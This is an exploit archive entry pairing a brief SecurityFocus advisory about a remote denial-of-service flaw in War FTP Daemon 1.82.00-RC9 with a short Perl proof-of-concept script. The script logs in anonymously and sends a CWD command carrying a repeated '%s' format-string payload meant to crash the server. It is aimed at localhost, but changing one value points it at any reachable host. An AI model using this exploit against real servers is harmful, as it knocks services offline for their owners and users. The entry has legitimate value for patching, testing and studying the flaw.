18 lines
No EOL
659 B
Perl
Executable file
18 lines
No EOL
659 B
Perl
Executable file
source: https://www.securityfocus.com/bid/12384/info
|
|
|
|
War FTP Daemon is reported prone to a remote denial of service vulnerability. This issue arises because the application fails to handle exceptional conditions in a proper manner.
|
|
|
|
War FTP Daemon 1.82.00-RC9 is reported prone to this issue. It is likely that previous versions are vulnerable as well.
|
|
|
|
#!/usr/bin/perl -w
|
|
# remote DoS PoC Exploit for WarFTPD 1.82 RC9
|
|
# THX 2 barabas 4 his GoldenFTP-sploit :)
|
|
# greetings fly out to Foobar
|
|
|
|
use strict;
|
|
use Net::FTP;
|
|
my $payload="%s"x115;
|
|
|
|
my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
|
|
$ftp->login("anonymous","123@123.com");
|
|
$ftp->quot("CWD",$payload); |